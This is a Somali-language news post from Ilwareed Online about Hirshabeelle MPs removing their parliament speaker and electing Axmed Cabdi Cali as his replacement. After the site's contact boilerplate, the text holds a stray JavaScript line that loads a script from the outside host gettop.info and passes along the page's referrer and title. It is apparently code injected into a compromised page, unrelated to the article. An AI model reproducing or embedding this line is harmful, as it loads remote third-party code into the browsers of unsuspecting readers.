Hirshabeelle: Guddoomiyaha Baarlamaanka Hirshabeelle oo xilka laga qaaday iyo Guddoomiye cusub oo la doortay

Ilwareed Online Xildhibaanada Baarlamaanka Maamulka Hirshabeelle gaar ahaan kuwa taageersan Madaxweyne Cali C/laahi Cosoble ayaa caawa xilkii ka qaaday Guddoomiyaha Baarlamaanka maamulkaasi Sheekh Cusmaan Barre Maxamed.

Xildhibaanada oo kulan ku yeeshay xarunta Madaxtooyada maamulka Hirshabeelle ayaa kulankooda waxaa soo xaadirtay 54 xildhibaan, waxaa ogolaatay in Sheekh Cusmaan xilka laga qaado 52, halka midna uu diiday, midka kalena uu ka aamusay.

Isla markii xildhibaanada ayaa guda galay Doorasho ay u qabteen ilaa Saddex shakhsi, kuwaasi u tartamay xilka Guddoomiyaha Baarlamaanka maamulka Hirshabeele, maadaama Sheekh Cusmaan ay sheegeen in ay xilkii ka qaadeen.

 

Maxamed C/raxmaan Khayre, Axmed Cabdi Cali, iyo Axmed Cabdi Faarax ayaa lagu kala magacaabaa Saddexda Qof ee u tartanatay xilka Guddoomiyaha Baarlamaanka Hirshabeelle.

Xildhibaanada ayaa u kala codeeyay Saddexdaas Qof, Maxamed C/raxmaan Khayre ayaa helay 11 cod, Axmed Cabdi Cali aya helay 35 cod halka, Axmed Cabdi Faarax uu helay 8 cod, waxaana ugu dambeyn sidaasi ku guuleystay Axmed Cabdi Cali.

 

Mogadishu – Somalia

Wixii warbixin ah waxaad noogu soo diri kartaa email: ilwareednet@gmail.com

fadlan like saar boggeena facebook : @ilwareedonline

The post Hirshabeelle: Guddoomiyaha Baarlamaanka Hirshabeelle oo xilka laga qaaday iyo Guddoomiye cusub oo la doortay appeared first on Ilwareed Online.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

You might also like More from author